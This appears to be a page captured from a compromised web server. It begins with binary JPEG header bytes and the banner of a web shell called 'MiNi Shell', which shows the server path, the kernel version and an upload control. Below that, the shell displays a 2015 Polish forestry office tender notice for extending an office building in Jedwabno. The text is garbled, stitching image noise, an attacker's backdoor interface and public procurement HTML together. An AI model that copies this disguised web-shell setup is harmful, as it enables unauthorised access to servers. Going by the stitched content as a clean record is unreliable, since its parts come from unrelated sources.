JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151029/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151029/289710-N-2015.html

<p class="kh_header"><b>Jedwabno: Rozbudowa, nadbudowa i przebudowa budynku biurowego nadleśnictwa na terenie siedziby Nadleśnictwa Jedwabno w Jedwabnie</b><br>
<b>Numer ogłoszenia: 289710 - 2015; data zamieszczenia: 29.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Jedwabno , ul. 1 Maja 3, 12-122 Jedwabno, woj. warmińsko-mazurskie, tel. 089 6213005, 6213775, faks 089 6213015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://jedwabno.olsztyn.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe - nadleśnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa, nadbudowa i przebudowa budynku biurowego nadleśnictwa na terenie siedziby Nadleśnictwa Jedwabno w Jedwabnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa, nadbudowa i przebudowa istniejącego budynku biurowego na terenie siedziby nadleśnictwa w Jedwabnie przy ul. 1 Maja 3, pow. szczycieński.
Rozbudowa budynku polegać ma na:
- dobudowaniu do jednej ze ścian szczytowych (płn.-zach.), dwóch segmentów administracyjnych, stanowiących przedłużenie budynku - niepodpiwniczonego z salą konferencyjną z zewn. tarasem i schodami zewn. oraz podpiwniczonego, w którym zlokalizowane zostaną szatnia, pomieszczenie socjalne i pomieszczenia sanitarne (na parterze), pokoje biurowe (na piętrze) i wentylatornia (w piwnicach); rozbudowywana, podpiwniczona część budynku przekryta będzie jednym, dwuspadowym dachem z dodatkowymi 2 lukarnami, natomiast niepodpiwniczona rozbudowa budynku przekryta będzie oddzielnymi dachami dwuspadowymi,
- wybudowaniu trójbiegowej niezadaszonej pochylni, umożliwiającej dostęp do budynku osobom niepełnosprawnym bezpośrednio z przyległego terenu na poziom kondygnacji parteru wraz z przebudową zewn. schodów wejściowych do budynku.
Nadbudowa budynku polegać ma na zabudowie murowanymi ścianami i drewnianym dachem dwuspadowym (z 2 lukarnami), przeznaczonego do likwidacji istniejącego tarasu na dobudówce przy drugiej ścianie szczytowej (płn.-wsch.), w celu utworzenia dodatkowych pokoi biurowych i serwerowni.
Przebudowa budynku polegać ma na:
- przebudowie istniejących pomieszczeń w celu poprawy funkcjonalności budynku i zachowania przepisów budowlanych i ppoż. oraz uzyskania dodatkowych pokoi biurowych i pomieszczeń sanitarnych, dostosowanych do ilości osób przebywających na każdej z kondygnacji użytkowych,
- przebudowie pomieszczeń piwnicznych w podpiwniczonej części istniejącego budynku poprzez pogłębienie jego posadowienia oraz podmurowanie i podbicie fundamentów,
- likwidacji istniejącej klatki schodowej i uzupełnieniu stropu nad piwnicą stropem gęstożebrowym oraz wydzieleniu w budynku strefy ppoż. z nową żelbetową klatką schodową,
- wymianie drewnianej konstrukcji dachowej na nową i pokrycia dachowego z blachodachówki na dachówkę ceramiczną i z papy termozgrzewalnej na blachę płaską, łączoną na rąbek stojący,
- wymianie istniejących stropów drewnianych nad parterem i poddaszem użytkowym na stropy niepalne (żelbetowe nad parterem) lub z niepalnymi okładzinami z 2 warstw płyt g.-k. na ruszcie metalowym (nad poddaszem),
- wymianie stolarki drzwiowej i okiennej wraz z montażem w dachu okien połaciowych i wyłazu dachowego,
- wykonaniu nowych zalicznikowych przyłączy - energetycznego i wodociągowego oraz przebudowie, przyłączanych do budynku fragmentów lokalnych sieci - ciepłowniczej i kanalizacyjnej,
- wymianie wewn. instalacji elektrycznych, sanitarnych (wod.-kan., c.o., c.w.u. z wykorzystaniem istniejącej inst. solarnej do podgrzewu wody), telekomunikacyjnych, sieci komputerowej i alarmowych oraz instalacji odgromowej, a także wykonaniu nowych instalacji - wentylacji mechanicznej i klimatyzacyjnej.
Rozbudowywany, nadbudowywany i przebudowywany istniejący budynek biurowy jest budynkiem murowanym, z dwiema nadziemnymi kondygnacjami i użytkowym poddaszem, całkowicie podpiwniczonym, o pow. zabudowy wynoszącej ok. 290 m2, pow. użytkowej - ok. 325 m2 i kubaturze - ok. 1.200 m3 (po rozbudowie pow. zabudowy wyniesie - ok. 600 m2,  pow. użytkowa - ok. 930 m2, a kubatura - ok. 4.800 m3).
Zakres robót budowlanych, związanych z wykonaniem przedmiotu zamówienia zawarty został w opracowanej na zlecenie Zamawiającego dokumentacji projektowej i obejmuje wykonanie robót ogólnobudowlanych i instalacyjnych, związanych m.in.:
1. w istniejącym budynku biurowym z:
- wymianą drewnianego stropu nad parterem na niepalny strop żelbetowy,
- wymianą dachu o konstrukcji drewnianej, pokrytego blachodachówką na nowy dach drewniany, kryty dachówką ceramiczną wraz z montażem w nim okien połaciowych i wyłazu dachowego oraz przebudową istniejących lukarn dachowych, połączoną z wymianą pokrycia dachowego z papy termozgrzewalnej na blachę płaską na rąbek stojący,
- pogłębieniem posadowienia oraz podmurowaniem i podbiciem fundamentów budynku,
- likwidacji istniejącej i wykonaniem nowej klatki schodowej (z żelbetowymi, monolitycznymi, belkowymi, dwubiegowymi schodami wewn.), doświetlonej zamontowanymi w ścianie nowymi oknami i zamontowanym w dachu lukarny oknem oddymiającym,
- likwidacją istniejącego tarasu na dobudówce i dokonaniem jego zabudowy ścianami i drewnianym dachem dwuspadowym, krytym dachówką ceramiczną wraz z budową 2 lukarn, przekrytych blachą tytanowo-cynkową na rąbek stojący,
- likwidacją kolidujących z rozbudową budynku bocznych zewn. schodów wejściowych i przebudową frontowych zewn. schodów wejściowych z zadaszeniem oraz dobudową pochylni  dla osób niepełnosprawnych,
- montażem obróbek blacharskich, rynien i rur spustowych z blachy tytanowo-cynkowej,
- przebudową pomieszczeń, wymianą drzwi wewn., posadzek, tynków i okładzin na ścianach i sufitach,
- dodatkowym dociepleniem ścian zewn. oraz wykonaniem izolacji cieplnej posadzek i ścian piwnicznych, stropów i dachu oraz wykonaniu elewacji na ścianach z tynku cienkowarstwowego, pomalowanego farbami odpornymi na porastanie mchami i glonami, a na cokole z tynku mozaikowego.
2. w rozbudowanej części budynku (posadowionego bezpośrednio na ławach i stopach żelbetowych) z:
- budową murowanej części biurowej, stanowiącej przedłużenie istniejącego budynku,
- budową parterowej murowanej sali konferencyjnej z dwuspadowym dachem o konstrukcji stalowo-drewnianej, przekrytym dachówką ceramiczną.
Ponadto w zakres zamówienia wchodzą również elementy zagospodarowaniu terenu w obszarze, związanym integralnie z rozbudową budynku biurowego. Przewiduje się m.in. wymianę, uzupełnienie i ułożenie  nawierzchni z kostki betonowej typu polbruk na istniejących prowadzących do budynku chodnikach, placu postojowym, przy wejściu na taras przy sali konferencyjnej i na opasce odwadniającej (wokół budynku istniejącego i budynku nowego) oraz wymianę latarni oświetleniowych typu parkowego na 5 nowych latarni typu parkowego (wokół budynku) i 7 nowych latarni typu wysokiego (przy wewn. drodze zakładowej) zasilanych projektowaną linią kablową oświetlenia ulicznego.
Szczegółowy zakres robót inwestycyjnych wynika z projektu budowlanego, projektu wykonawczego, specyfikacji technicznych wykonania i odbioru robót (STWiOR) oraz przedmiarów robót. Dokumentacja projektowa zawierająca te elementy przekazana zostanie tym Wykonawcom, którzy zaproszeni zostaną do składania ofert w II etapie postępowania przetargowego.
Przewiduje się rozliczenie wykonanych robót w czterech kwartalnych etapach, wynikających z uzgodnionego z Zamawiającym harmonogramu realizacji i odbioru robót, stanowiących zakończone w całości elementy budynku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.28.00-9, 45.11.10.00-8, 45.22.30.00-6, 45.22.31.00-7, 45.23.13.00-8, 45.23.22.00-4, 45.26.10.00-4, 45.31.00.00-3, 45.31.12.00-2, 45.31.60.00-5, 45.31.40.00-1, 45.33.11.00-7, 45.33.12.10-1, 45.33.12.30-7, 45.33.23.00-6, 45.41.00.00-4, 45.42.10.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.31.20.00-7, 45.31.43.10-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wniesienie wadium przetargowego w wysokości 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100 złotych) wymagane będzie od Wykonawców, zaproszonych przez Zamawiającego do złożenia oferty przetargowej (po I etapie postępowania przetargowego). Wadium to winni oni wnieść przed terminem składania ofert. Wadium może być wniesione w formach dopuszczonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Wadium wnoszone w formie pieniężnej wpłacić należy na rachunek bankowy Zamawiającego wskazany w Specyfikacji Istotnych Warunków Zamówienia (SIWZ) z dopiskiem na blankiecie przelewu: wadium przetargowe - rozbudowa i przebudowa bud. biurowego.
Zamawiający zwróci niezwłocznie wadium, jeżeli nastąpią okoliczności określone w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunków wyszczególnionych w art. 22 ust. 1 pkt 1 Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o treści odpowiadającej art. 22 ust. 1 pkt 1 ustawy Prawo zamówień publicznych (wg załącznika nr 1 do druku wniosku). Innych specjalnych wymagań w tym zakresie Zamawiający nie stawia.
Zamawiający oceni spełnienie wyżej wymienionego warunku według kryterium: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku wyszczególnionego w art. 22 ust. 1 pkt 2 Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o treści odpowiadającej art. 22 ust. 1 pkt 2 ustawy Prawo zamówień publicznych (wg załącznika nr 1 do druku wniosku) oraz załącza do wniosku wykaz zamówień zrealizowanych przez Wykonawcę w ciągu ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i zakresem robotom budowlanym, stanowiącym przedmiot zamówienia, tj. wykonaniem w budynkach o kubaturze powyżej 1.000 m3 kompleksowych robót remontowych lub inwestycyjnych ogólnobudowlanych i instalacyjnych (sanitarnych i elektrycznych) o łącznej wartości każdego z zamówień min. 400 tys. złotych (netto), w ramach których dokonano m.in. wymiany lub budowy dachu o konstrukcji drewnianej co najmniej dwuspadowej, wymieniono stolarkę okienną i drzwiową na nową w budynkach mieszkalnych, biurowych lub użyteczności publicznej oraz wykonano w ramach tych samych zamówień (lub innych, bez względu na ich całkowitą wartość netto) co najmniej po jednym z następujących elementów lub rodzajów robót:
- żelbetowe monolityczne stropy i schody zabiegowe,
- pogłębienie posadowienia budynku, podmurowanie i podbicie jego fundamentów,
- ułożenie pokrycie dachowego z dachówki ceramicznej,
- roboty instalacyjne instalacji wod.-kan., c.w.u. i c.o.,
- roboty instalacyjne wewn. instalacji elektrycznych;
w wykazach zamówień (wg załącznika nr 5 do druku wniosku) należy podać nazwę i adres inwestora, wartość netto zrealizowanych zamówień oraz daty, miejsca i zakresy wykonanych robót; do wykazów należy załączyć dowody, potwierdzające, że roboty wymienione w ww. wykazie wykonane zostały w sposób należyty i zgodny z wymaganiami inwestorów i zasadami sztuki budowlanej; dowodami tymi mogą być poświadczenia (referencje) inwestorów na rzecz których roboty te były wykonywane (ewentualnie kopie końcowych protokołów odbioru robót).
Za spełnienie warunku w tym punkcie uważać się będzie wykonanie co najmniej dwóch zamówień na budynkach o kubaturze powyżej 1.000 m3 kompleksowych robót remontowych lub inwestycyjnych o wartości min. 400 tys. zł netto (z wymianą lub budową dachu o konstrukcji drewnianej co najmniej dwuspadowej oraz montażem stolarki okiennej i drzwiowej) oraz zamówień, bez względu na ich ilość i wartość netto (tych samych lub innych), w ramach których wykonano co najmniej po jednym z ww. elementów lub rodzajów robót (tj. wykonanie monolitycznych żelbetowych stropów i schodów zabiegowych, pogłębienie posadowienia budynku, podmurowanie i podbicie jego fundamentów, ułożenie pokrycia dachowego  z dachówki ceramicznej, wykonanie robót instalacyjnych inst. sanitarnych (wod.-kan., c.w.u. i c.o.) i robót instalacyjnych wewn. inst. elektrycznych); Wykonawca winien ww. zamówienia wymienić na pierwszych miejscach w przedłożonych wykazach zrealizowanych zamówień. Zamówienia o wartości min. 400 tys. zł netto, wymienione w wykazie (lub zawarte w wykazie dodatkowym), służyć będą do dokonania oceny punktowej stopnia spełnienia warunku wiedzy i doświadczenia, w celu sporządzenia rankingu Wykonawców, ubiegających się o zamówienie i wyłonienia nich tych, do których Zamawiający skieruje zaproszenie do złożenia swoich ofert przetargowych.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający oceni spełnienie wyżej wymienionego warunku według kryterium: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku wyszczególnionego w art. 22 ust. 1 pkt 3 Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o treści odpowiadającej art. 22 ust. 1 pkt 3 ustawy prawo zamówień publicznych (wg załącznika nr 1 do druku wniosku).
Wykonawca może polegać na potencjale technicznym innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający oceni spełnienie wyżej wymienionego warunku według kryterium: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku wyszczególnionego w art. 22 ust. 1 pkt 3 Wykonawca składa oświadczenie, że w całym okresie realizowanego przez niego przedmiotu zamówienia, będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia poprzez pełnienie m.in.;
- funkcji kierownika budowy,
- funkcji kierownika robót, posiadającego stosowne uprawnienia i kwalifikacje zawodowe do kierowania lub wykonywania robót w specjalnościach instalacyjnych w zakresie instalacji sanitarnych,
- funkcji kierownika robót, posiadającego stosowne uprawnienia i kwalifikacje zawodowe do kierowania lub wykonywania robót w specjalnościach instalacyjnych w zakresie instalacji elektrycznych.
W oświadczeniu tym Wykonawca oświadcza też, że osoba, która pełnić będzie funkcje kierownika budowy posiada wymagane przepisami Prawa budowlanego uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie (uprawnienia budowlane bez ograniczeń) o specjalności konstrukcyjno-budowlanej w zakresie kierowania robotami budowlanymi, przynależy do okręgowej izby samorządu budowlanego i posiada wymagane prawem ubezpieczenie od odpowiedzialności cywilnej w zakresie działalności zawodowej w okresie wykonywania przez Wykonawcę zamówienia (wg załącznika nr 1 do druku wniosku) oraz załącza do składanego wniosku imienny wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich uprawnień i kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub pełnionych funkcji (wg załącznika nr 4 do druku wniosku);
Na spełnienie tego warunku udziału w postępowaniu, Zamawiający za wystarczające uzna dysponowanie przez Wykonawcę osobą, które pełnić będzie obowiązki kierownika budowy branży ogólnobudowlanej oraz dysponowanie co najmniej 1 osobą, która w branży instalacji sanitarnych będzie pełnić będzie obowiązki kierownika tego typu robót lub/i wykonywać roboty instalacyjne (sanitarne) oraz co najmniej 1 osobą, która w branży instalacji elektrycznych będzie pełnić będzie obowiązki kierownika tego typu robót lub/i wykonywać roboty instalacyjne (elektryczne); osoby te powinny posiadać przewidziane prawem stosowne uprawnienia wykonawcze i kwalifikacje, uprawniające do pełnienia przez nie funkcji kierownika robót w odpowiedniej w branży (sanitarnej lub elektrycznej) oraz przynależeć do okręgowej izby samorządu budowlanego i posiadać wymagane prawem ubezpieczenie od odpowiedzialności cywilnej w zakresie działalności zawodowej w okresie wykonywania przez Wykonawcę zamówienia.
W związku z zawartym w dokumentacji projektowej opracowaniem, dotyczącym wykonania w przebudowywanym i rozbudowywanym budynku biurowym instalacji wentylacyjnej (mechanicznej nawiewno-wywiewnej) i klimatyzacyjnej, instalacji alarmowej oraz instalacji sieci komputerowej, Wykonawca, o ile sam nie posiada osób zdolnych do wykonania zamówienia w tych specjalizacjach, może polegać na osobach zdolnych do wykonania zamówienia, pochodzących od innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował on tymi zasobami (osobami) niezbędnymi do realizacji zamówienia w tym zakresie, przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (osób) na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający oceni spełnienie wyżej wymienionego warunku według kryterium: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunków wyszczególnionych w art. 22 ust. 1 pkt 4 Wykonawca:
1. składa oświadczenie o spełnieniu warunków udziału w postępowaniu o treści odpowiadającej art. 22 ust. 1 pkt 4 ustawy Prawo zamówień publicznych (wg załącznika nr 1 do druku wniosku), w którym jednocześnie zobowiązuje się, że w przypadku uznania jego oferty za najkorzystniejszą:
- do ubezpieczenia budowy od ryzyka utraty lub uszkodzenia przedmiotu umowy na wartość nie niższą niż zaoferowana przez niego cena brutto wykonania zamówienia przed rozpoczęciem robót w terminie wskazanym w umowie oraz przedłożenia Zamawiającemu kserokopii ww. polis ubezpieczeniowych (lub innych dokumentów), potwierdzających zawarcie ubezpieczenia na okres trwania realizacji zamówienia,
- do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny podanej w ofercie Wykonawcy (pod rygorem utraty wniesionego wadium przetargowego)
przed rozpoczęciem robót w terminie wskazanym w umowie
2. załącza do wniosku opłaconą, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, polisę ubezpieczeniową (w postaci potwierdzonej przez Wykonawcę za zgodność z oryginałem kopii) lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę min. 1.000.000 zł (słownie: jeden milion złotych) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia. Zamawiający wymaga, aby na dzień złożenia wniosków o dopuszczenie do udziału w postępowaniu przetargowym ubezpieczenie obejmowało co najmniej okres od dnia składania wniosków do dnia 31 grudnia 2015 r.. Wykonawca musi się również zobowiązać, że w przypadku uznania jego oferty za najkorzystniejszą, zawrze on takie ubezpieczenie na okres trwania realizacji zamówienia zgodnie z podpisaną z nim przez Zamawiającego umową.
Zamawiający oceni spełnienie wyżej wymienionych warunków według kryterium: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

